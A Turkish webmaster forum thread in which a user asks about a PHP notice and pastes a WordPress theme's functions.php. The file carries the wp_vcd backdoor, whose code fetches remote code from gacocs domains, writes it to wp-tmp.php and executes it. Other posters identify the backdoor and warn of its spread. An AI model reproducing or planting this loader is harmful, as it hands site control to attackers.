wmaraci reklam

functions.php 82 hatası nedir

11 Mesajlar 1.855 Okunma
wmaraci reklam

Webarazzi Webarazzi <?php print("Webarazzi"?> Kullanıcı
  • Üyelik 05.03.2016
  • Yaş/Cinsiyet 35 / E
  • Meslek Birtekno'loji Sahibi
  • Konum Çorum
  • Ad Soyad M** B**
  • Mesajlar 1063
  • Beğeniler 31 / 186
  • Ticaret 5, (%100)
Merhaba arkadaşlar functions.php dosyasında aşağıda görülen 82 hatası alıyorum 82 hatası nedir neden yapar ?

Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/oxmymbvtnsmw/public_html/wp-content/themes/classiadspro/functions.php on line 82
 

 

Türkiyenin Webmaster Topluluğu - Wmclubu.com
wmaraci
reklam

haliluunal haliluunal Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 19.06.2018
  • Yaş/Cinsiyet 27 / E
  • Meslek Ağ ve bilgisayar sistemleri yö
  • Konum Ankara
  • Ad Soyad H** Ü**
  • Mesajlar 665
  • Beğeniler 80 / 270
  • Ticaret 0, (%0)
82 hatası değil hocam, 82.satırda sorun olduğunu söylüyor bi göz atmanızda fayda var ve hatada şöyle diyor 'request_uri' adında tanımlı bir değişken yok
 

 

Mango Mango WM Aracı Kullanıcı
  • Üyelik 23.11.2015
  • Yaş/Cinsiyet 29 / E
  • Meslek Front-End Developer
  • Konum Bursa
  • Ad Soyad N** K**
  • Mesajlar 311
  • Beğeniler 8 / 81
  • Ticaret 0, (%0)
sanırım yanlış kullanımdan ötürü bunu söylüyor. tam kodları atmadığınız için bir şey söylemek zor ancak komutun aşağıdaki şekilde kullanılması gerekiyor.

$_SERVER['REQUEST_URI'];
 

 

Webarazzi Webarazzi <?php print("Webarazzi"?> Kullanıcı
  • Üyelik 05.03.2016
  • Yaş/Cinsiyet 35 / E
  • Meslek Birtekno'loji Sahibi
  • Konum Çorum
  • Ad Soyad M** B**
  • Mesajlar 1063
  • Beğeniler 31 / 186
  • Ticaret 5, (%100)
düzelmedi hocam. kodlar bu


if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ea685306a6602b23a06361f9eb136620'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}





function image_seo($content)
{global $post;preg_match_all('//', $content, $images);
if(!is_null($images)) {foreach($images[1] as $index => $value)
{if(!preg_match('/alt=/', $value)){
$new_img = str_replace('$content = str_replace($images[0][$index], $new_img, $content);}}}
return $content;
}
add_filter('the_content', 'image_seo', 70000);



$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='bdfd06dbb4d2877792ee6535848742df';
if (($tmpcontent = @file_get_contents("http://www.gacocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.gacocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.gacocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.gacocs.xyz/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>/**
* Class and Function List:
* Function list:
* - init()
* - constants()
* - widgets()
* - supports()
* - functions()
* - language()
* - add_metaboxes()
* - admin()
* - post_types()
* - pacz_theme_enqueue_scripts()
* - pacz_preloader_script()
*/
function classiadspro_load_textdomain() {
load_theme_textdomain( 'classiadspro', get_template_directory() . '/languages' );
}
add_action( 'after_setup_theme', 'classiadspro_load_textdomain' );
$theme = new Classiadspro_Theme();
$theme->init(array(
"theme_name" => "Classiadspro",
"theme_slug" => "classiadspro",
));

class Classiadspro_Theme
{
function init($options)
{
$this->pacz_constants($options);
$this->pacz_functions();
$this->pacz_admin();

add_action('init', array(&$this,
'pacz_add_metaboxes',
));

add_action('after_setup_theme', array(&$this,
'pacz_supports',
));
add_action('widgets_init', array(&$this,
'pacz_widgets',
));


}

function pacz_constants($options)
{
define("PACZ_THEME_DIR", get_template_directory());
define("PACZ_THEME_DIR_URI", get_template_directory_uri());
define("PACZ_THEME_NAME", $options["theme_name"]);
define("CLASSIADSPRO_THEME_OPTIONS_BUILD", $options["theme_name"] . '_options_build');
define("PACZ_THEME_SLUG", $options["theme_slug"]);
define("PACZ_THEME_STYLES", PACZ_THEME_DIR_URI . "/styles/css");
define("PACZ_THEME_IMAGES", PACZ_THEME_DIR_URI . "/images");
define("PACZ_THEME_JS", PACZ_THEME_DIR_URI . "/js");
define("PACZ_THEME_INCLUDES", PACZ_THEME_DIR . "/includes");
define("PACZ_THEME_FRAMEWORK", PACZ_THEME_INCLUDES . "/framework");
define("PACZ_THEME_ACTIONS", PACZ_THEME_INCLUDES . "/actions");
define("PACZ_THEME_PLUGINS_CONFIG", PACZ_THEME_INCLUDES . "/plugins-config");
define("PACZ_THEME_PLUGINS_CONFIG_URI", PACZ_THEME_DIR_URI . "/includes/plugins-config");
define('PACZ_THEME_METABOXES', PACZ_THEME_FRAMEWORK . '/metaboxes');
define('PACZ_THEME_ADMIN_URI', PACZ_THEME_DIR_URI . '/includes');
define('PACZ_THEME_ADMIN_ASSETS_URI', PACZ_THEME_DIR_URI . '/includes/assets');
}

function pacz_widgets()
{
require_once (trailingslashit( get_template_directory() ).'includes/custom-post/widgets/widgets-popular-posts.php');
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-recent-posts.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-video.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-comments.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-custom-menu.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-image.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-about.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-flickr-feeds.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-author.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-social-networks.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/widgets/widgets-subscription.php");

register_widget("Classiadspro_Widget_Popular_Posts");
register_widget("Classiadspro_Widget_Recent_Posts");
register_widget("Classiadspro_Widget_Video");
register_widget("Classiadspro_Widget_Flickr_Feeds");
register_widget("Classiadspro_WP_Widget_Recent_Comments");
register_widget("Classiadspro_WP_Nav_Menu_Widget");
register_widget("Classiadspro_Widget_Image");
register_widget("Classiadspro_Widget_About");
register_widget("Classiadspro_Widget_Author");
register_widget("Classiadspro_Widget_Social");
register_widget("Classiadspro_Widget_Subscription_Form");
}

function pacz_supports()
{
global $pacz_settings;
$content_width = '';
if (!isset($content_width)) {
$content_width = $pacz_settings['grid-width'];
}

if (function_exists('add_theme_support')) {
add_theme_support('menus');
add_theme_support('automatic-feed-links');
add_theme_support('editor-style');
add_theme_support( 'title-tag' );
add_theme_support( 'custom-header' );
add_theme_support( 'custom-background' );
/* Add Woocmmerce support */
add_theme_support('woocommerce');

add_theme_support('post-formats', array(
'image',
'video',
'quote',
'link'
));
register_nav_menus(array(
'primary-menu' => 'Primary Navigation',
'second-menu' => 'Second Navigation',
'third-menu' => 'Third Navigation',
'fourth-menu' => 'Fourth Navigation',
'fifth-menu' => 'Fifth Navigation',
'sixth-menu' => 'Sixth Navigation',
'seventh-menu' => 'Seventh Navigation',
));

add_theme_support('post-thumbnails');
}
}

function pacz_functions()
{
require_once PACZ_THEME_FRAMEWORK . "/ReduxCore/framework.php";
require_once PACZ_THEME_FRAMEWORK . "/ReduxCore/options-config.php";
require_once PACZ_THEME_FRAMEWORK . "/general.php";
require_once PACZ_THEME_FRAMEWORK . "/woocommerce.php";
require_once PACZ_THEME_PLUGINS_CONFIG . "/ajax-search.php";
require_once PACZ_THEME_PLUGINS_CONFIG . "/wp-nav-custom-walker.php";
require_once PACZ_THEME_FRAMEWORK . '/sidebar-generator.php';
require_once PACZ_THEME_PLUGINS_CONFIG . "/pagination.php";
require_once PACZ_THEME_PLUGINS_CONFIG . "/image-cropping.php";
//require_once PACZ_THEME_FRAMEWORK . "/dynamic-helper.php";
//require_once PACZ_THEME_FRAMEWORK . "/dynamic.php";
require_once PACZ_THEME_PLUGINS_CONFIG . "/tgm-plugin-activation/request-plugins.php";

require_once PACZ_THEME_PLUGINS_CONFIG . "/love-this.php";
//require_once PACZ_THEME_FRAMEWORK . "/theme-skin.php";
require_once PACZ_THEME_FRAMEWORK . "/Mobile_Detect.php";
require_once PACZ_THEME_INCLUDES . "/thirdparty-integration/wpml-fix/pacz-wpml.php";

/*
Theme elements hooks
*/
require_once (trailingslashit( get_template_directory() )."includes/actions/header.php");
require_once (trailingslashit( get_template_directory() )."includes/actions/posts.php");
require_once (trailingslashit( get_template_directory() )."includes/actions/general.php");
//require_once (trailingslashit( get_template_directory() )."includes/actions/admin_menu.php");

/* Blog Styles @since V1.0 */
require_once (trailingslashit( get_template_directory() )."includes/custom-post/blog-styles/classic.php");

/* Blog Styles @since V1.0 */
require_once (trailingslashit( get_template_directory() )."includes/custom-post/blog-styles/thumb.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/blog-styles/tile.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/blog-styles/tile-elegant.php");
require_once (trailingslashit( get_template_directory() )."includes/custom-post/blog-styles/scroller.php");
//require_once (trailingslashit( get_template_directory() )."demo-templates/install-template2.php");

}


function pacz_add_metaboxes()
{
require_once PACZ_THEME_FRAMEWORK . '/metabox-generator.php';
require_once PACZ_THEME_METABOXES . '/metabox-layout.php';
require_once PACZ_THEME_METABOXES . '/metabox-posts.php';
require_once PACZ_THEME_METABOXES . '/metabox-employee.php';
require_once PACZ_THEME_METABOXES . '/metabox-pages.php';
require_once PACZ_THEME_METABOXES . '/metabox-clients.php';
require_once PACZ_THEME_METABOXES . '/metabox-testimonials.php';
include_once PACZ_THEME_METABOXES . '/metabox-skinning.php';
include_once PACZ_THEME_METABOXES . '/metabox-woo.php';
}

function pacz_admin()
{
if (is_admin()) {

require_once PACZ_THEME_FRAMEWORK . '/admin.php';
require_once PACZ_THEME_PLUGINS_CONFIG . '/mega-menu.php';
require_once PACZ_THEME_FRAMEWORK . '/icon-library.php';

}
}


}

function pacz_theme_enqueue_scripts()
{
if (!is_admin()) {

global $pacz_settings;
$theme_data = wp_get_theme("classiadspro");

wp_enqueue_script('jquery-ui-tabs');
wp_register_script('jquery-jplayer', PACZ_THEME_JS . '/jquery.jplayer.min.js', array(
'jquery'
) , $theme_data['Version'], true);
wp_register_script('instafeed', PACZ_THEME_JS . '/instafeed.min.js', array(
'jquery'
) , $theme_data['Version'], true);
if ( ! wp_script_is( 'bootstrap', 'enqueued' ) ) {
wp_enqueue_script('bootstrap', PACZ_THEME_JS . '/bootstrap.min.js', array(
'jquery'
) , $theme_data['Version'], true);
}
if ( ! wp_script_is( 'select2', 'enqueued' ) ) {
wp_enqueue_script('select2', PACZ_THEME_JS . '/select2.min.js', array(
'jquery'
) , $theme_data['Version'], true);
}
if ( ! wp_script_is( 'owl.carousel', 'enqueued' ) ) {
wp_enqueue_script('owl.carousel', PACZ_THEME_JS . '/owl.carousel.min.js', array(
'jquery'
) , $theme_data['Version'], true);
}
wp_enqueue_script('pacz-triger', PACZ_THEME_JS . '/triger.min.js', array(
'jquery'
) , $theme_data['Version'], true);
wp_enqueue_script('pacz-theme-plugins', PACZ_THEME_JS . '/plugins.min.js', array(
'jquery'
) , $theme_data['Version'], true);
if ($pacz_settings['minify-js']) {
wp_enqueue_script('pacz-theme-scripts', PACZ_THEME_JS . '/theme-scripts.min.js', array(
'jquery'
) , $theme_data['Version'], true);
}else{
wp_enqueue_script('pacz-theme-scripts', PACZ_THEME_JS . '/theme-scripts.js', array(
'jquery'
) , $theme_data['Version'], true);
}
$custom_js_file = get_stylesheet_directory() . '/custom.js';
$custom_js_file_uri = get_stylesheet_directory_uri() . '/custom.js';

if (file_exists($custom_js_file)) {
wp_enqueue_script('pacz-custom-js', $custom_js_file_uri, array(
'jquery'
) , $theme_data['Version'], true);
}
if (is_rtl() ) {
wp_enqueue_script('pacz-vc-rtl-fix', PACZ_THEME_JS . '/vc-rtl-fix.min.js', array(
'jquery'
) , $theme_data['Version'], true);
}

if (is_singular()) {
wp_enqueue_script('comment-reply');
}
if($pacz_settings['minify-css']){
$css_min = '.min';
}else{
$css_min = '';
}
if ( ! wp_style_is( 'bootstrap', 'enqueued' ) ) {
wp_enqueue_style('bootstrap', PACZ_THEME_STYLES . '/bootstrap.min.css', false, $theme_data['Version'], 'all');
}
wp_enqueue_style('pacz-styles-default', PACZ_THEME_STYLES . '/styles' . $css_min . '.css', false, $theme_data['Version'], 'all');
wp_enqueue_style('pacz-styles', PACZ_THEME_STYLES . '/pacz-styles' . $css_min . '.css', false, $theme_data['Version'], 'all');
wp_enqueue_style('pacz-blog', PACZ_THEME_STYLES . '/pacz-blog' . $css_min . '.css', false, $theme_data['Version'], 'all');
if(!class_exists('Classiadspro_Static_Files')){
wp_enqueue_style('pacz-dynamic-css', PACZ_THEME_STYLES . '/classiadspro-dynamic.css', false, $theme_data['Version'], 'all');
wp_add_inline_style('pacz-dynamic-css', pacz_enqueue_font_icons());
}
wp_enqueue_style('pacz-common-shortcode', PACZ_THEME_STYLES . '/shortcode/common-shortcode' . $css_min . '.css', false, $theme_data['Version'], 'all');
wp_enqueue_style('pacz-fonticon-custom', PACZ_THEME_STYLES . '/fonticon-custom.min.css', false, $theme_data['Version'], 'all');

}
}

add_action('wp_enqueue_scripts', 'pacz_theme_enqueue_scripts', 1);


/*==========================
This snippet contains utility functions to create/update and pull data from the active user transient.
Copy these contents to functions.php
===========================*/
//Update user online status
add_action('init', 'gearside_users_status_init');
add_action('admin_init', 'gearside_users_status_init');
function gearside_users_status_init(){
$logged_in_users = get_transient('users_status'); //Get the active users from the transient.
$user = wp_get_current_user(); //Get the current user's data
//Update the user if they are not on the list, or if they have not been online in the last 900 seconds (15 minutes)
if ( !isset($logged_in_users[$user->ID]['last']) || $logged_in_users[$user->ID]['last'] <= time()-900 ){
$logged_in_users[$user->ID] = array(
'id' => $user->ID,
'username' => $user->user_login,
'last' => time(),
);
set_transient('users_status', $logged_in_users, 900); //Set this transient to expire 15 minutes after it is created.
}
}
//Check if a user has been online in the last 15 minutes
function gearside_is_user_online($id){
$logged_in_users = get_transient('users_status'); //Get the active users from the transient.

return isset($logged_in_users[$id]['last']) && $logged_in_users[$id]['last'] > time()-900; //Return boolean if the user has been online in the last 900 seconds (15 minutes).
}
//Check when a user was last online.
function gearside_user_last_online($id){
$logged_in_users = get_transient('users_status'); //Get the active users from the transient.

//Determine if the user has ever been logged in (and return their last active date if so).
if ( isset($logged_in_users[$id]['last']) ){
return $logged_in_users[$id]['last'];
} else {
return false;
}
}

/*==========================
This snippet shows how to add a column to the Users admin page with each users' last active date.
Copy these contents to functions.php
===========================*/

//Add columns to user listings
add_filter('manage_users_columns', 'gearside_user_columns_head');
function gearside_user_columns_head($defaults){
$defaults['status'] = 'Status';
return $defaults;
}
add_action('manage_users_custom_column', 'gearside_user_columns_content', 15, 3);
function gearside_user_columns_content($value='', $column_name, $id){
if ( $column_name == 'status' ){
if ( gearside_is_user_online($id) ){
return 'Online Now';
} else {
return ( gearside_user_last_online($id) )? 'Last Seen:
' . date('M j, Y @ g:ia', gearside_user_last_online($id)) . '
' : ''; //Return the user's "Last Seen" date, or return empty if that user has never logged in.
}
}
}

/*==========================
This snippet shows how to add an active user count to the WordPress Dashboard.
Copy these contents to functions.php
===========================*/
//Active Users Metabox
add_action('wp_dashboard_setup', 'gearside_activeusers_metabox');
function gearside_activeusers_metabox(){
global $wp_meta_boxes;
wp_add_dashboard_widget('gearside_activeusers', 'Active Users', 'dashboard_gearside_activeusers');
}
function dashboard_gearside_activeusers(){
$user_count = count_users();
$users_plural = ( $user_count['total_users'] == 1 )? 'User' : 'Users'; //Determine singular/plural tense
echo '
' . $user_count['total_users'] . ' ' . $users_plural . ' (' . gearside_online_users('count') . ' currently active)
';
}
//Get a count of online users, or an array of online user IDs.
//Pass 'count' (or nothing) as the parameter to simply return a count, otherwise it will return an array of online user data.
function gearside_online_users($return='count'){
$logged_in_users = get_transient('users_status');

//If no users are online
if ( empty($logged_in_users) ){
return ( $return == 'count' )? 0 : false; //If requesting a count return 0, if requesting user data return false.
}

$user_online_count = 0;
$online_users = array();
foreach ( $logged_in_users as $user ){
if ( !empty($user['username']) && isset($user['last']) && $user['last'] > time()-900 ){ //If the user has been online in the last 900 seconds, add them to the array and increase the online count.
$online_users[] = $user;
$user_online_count++;
}
}
return ( $return == 'count' )? $user_online_count : $online_users; //Return either an integer count, or an array of all online user data.

}


function pacz_preloader_script()
{

if (!global_get_post_id()) {
return false;
}

$preloader = get_post_meta(global_get_post_id() , '_preloader', true);

if ($preloader == 'true') {
wp_enqueue_script('QueryLoader', PACZ_THEME_JS . '/jquery.queryloader2-min.js', array(
'jquery'
) , false, false);
}
}


add_action('wp_enqueue_scripts', 'pacz_preloader_script', 1);

/* header script */

add_action('wp_enqueue_scripts', 'pacz_header_scripts', 1);
function pacz_header_scripts() {
global $pacz_settings, $pacz_accent_color, $post, $classiadspro_json,$level_num,$uID;
$post_id = global_get_post_id();



?>

<script>

// Declare theme scripts namespace
var classiadspro = {};
var php = {};

var pacz_images_dir = "",
pacz_theme_dir = "",
pacz_theme_js_path = "",
pacz_captcha_placeholder = "",
pacz_captcha_invalid_txt = "",
pacz_header_toolbar = "",
pacz_captcha_correct_txt = "",
pacz_nav_res_width = ,
pacz_header_sticky = ,
pacz_grid_width = ,
pacz_preloader_logo = "",
pacz_header_padding = ,
pacz_accent_color = "",
pacz_squeeze_header = ,
pacz_logo_height = ,
pacz_preloader_txt_color = "",
pacz_preloader_bg_color = "";
pacz_preloader_bar_color = "",
pacz_no_more_posts = "";
pacz_header_structure = "";
pacz_boxed_header = "";
pacz_footer_mailchimp_listid = "";
pacz_login_url = ""
$pacz_header_trans_offset = get_post_meta($post_id, '_trans_header_offset', true ) ? get_post_meta($post_id, '_trans_header_offset', true ) : 0;
?> var pacz_header_trans_offset = ;


pacz_owl_rtl = ;


pacz_owl_rtl = ;

</script>


/* footer scripts */
add_action('wp_footer', 'pacz_footer_elements', 1);
function pacz_footer_elements() {
global $pacz_settings, $pacz_accent_color, $post, $classiadspro_json;
$post_id = global_get_post_id();


?>

<script>

</script>



global $classiadspro_dynamic_styles;

$classiadspro_dynamic_styles_ids = array();
$classiadspro_dynamic_styles_inject = '';

$classiadspro_styles_length = count($classiadspro_dynamic_styles);

if ($classiadspro_styles_length > 0) {
foreach ($classiadspro_dynamic_styles as $key => $val) {
$classiadspro_dynamic_styles_ids[] = $val["id"];
$classiadspro_dynamic_styles_inject .= $val["inject"];
};
}

?>
<script>
window.$ = jQuery

var dynamic_styles = '';
var dynamic_styles_ids = ( != null) ? : [];

var styleTag = document.createElement('style'),
head = document.getElementsByTagName('head')[0];

styleTag.type = 'text/css';
styleTag.setAttribute('data-ajax', '');
styleTag.innerHTML = dynamic_styles;
head.appendChild(styleTag);


$('.pacz-dynamic-styles').each(function() {
$(this).remove();
});

function ajaxStylesInjector() {
$('.pacz-dynamic-styles').each(function() {
var $this = $(this),
id = $this.attr('id'),
commentedStyles = $this.html();
styles = commentedStyles
.replace('', '');

if(dynamic_styles_ids.indexOf(id) === -1) {
$('style[data-ajax]').append(styles);
$this.remove();
}

dynamic_styles_ids.push(id);
});
};
</script>




 

 

Türkiyenin Webmaster Topluluğu - Wmclubu.com
wmaraci
wmaraci

SENibrahim SENibrahim ibocum Kullanıcı
  • Üyelik 22.12.2017
  • Yaş/Cinsiyet 23 / E
  • Meslek Öğrenci
  • Konum Aydın
  • Ad Soyad İ** Ş**
  • Mesajlar 4598
  • Beğeniler 1727 / 1541
  • Ticaret 15, (%100)
Yalnız attığınız functions.php shell mevcut. Daha doğrusu backdoor var.
 

 

Herkez hata yapabilir, pardon herkes. | ibocum.com

Webarazzi Webarazzi <?php print("Webarazzi"?> Kullanıcı
  • Üyelik 05.03.2016
  • Yaş/Cinsiyet 35 / E
  • Meslek Birtekno'loji Sahibi
  • Konum Çorum
  • Ad Soyad M** B**
  • Mesajlar 1063
  • Beğeniler 31 / 186
  • Ticaret 5, (%100)
themeforest aldığım tema hocam.
 

 

Türkiyenin Webmaster Topluluğu - Wmclubu.com

SENibrahim SENibrahim ibocum Kullanıcı
  • Üyelik 22.12.2017
  • Yaş/Cinsiyet 23 / E
  • Meslek Öğrenci
  • Konum Aydın
  • Ad Soyad İ** Ş**
  • Mesajlar 4598
  • Beğeniler 1727 / 1541
  • Ticaret 15, (%100)
TemaYeri Backdoor kesin var bu temada.
 

 

Herkez hata yapabilir, pardon herkes. | ibocum.com

Webarazzi Webarazzi <?php print("Webarazzi"?> Kullanıcı
  • Üyelik 05.03.2016
  • Yaş/Cinsiyet 35 / E
  • Meslek Birtekno'loji Sahibi
  • Konum Çorum
  • Ad Soyad M** B**
  • Mesajlar 1063
  • Beğeniler 31 / 186
  • Ticaret 5, (%100)
Bakın.

 

 

Türkiyenin Webmaster Topluluğu - Wmclubu.com

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
TemaYeri arkadışın dediği gibi zaralı kod gibi gözüküyor temanın orjinal olduğunu söylüyorsunuz evet bu tema orjinal olabilir eğer localhostda daha önce veya şunda orijinal olmayan tema kullandıysanız veya şuanda varsa tüm çalıştırdığınız temalara yayılır. diğer temaları inceleyiniz hatta wordpress içinde orijinal gelen temaların funtions.php'lerine bakın onlara dahi bu bulaşmıştır. twentyfifteen, twentyseventeen, twentysixteen gibi. localhostda functions.php sayfalarında şuna benzer şeyler varsa geçmiş olsun derim biran önce temizlik yapmaya başlayın derim

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
 

 

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 38 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
TemaYeri ayrıca şu sitede bahsetmiş https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d
 

 

wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al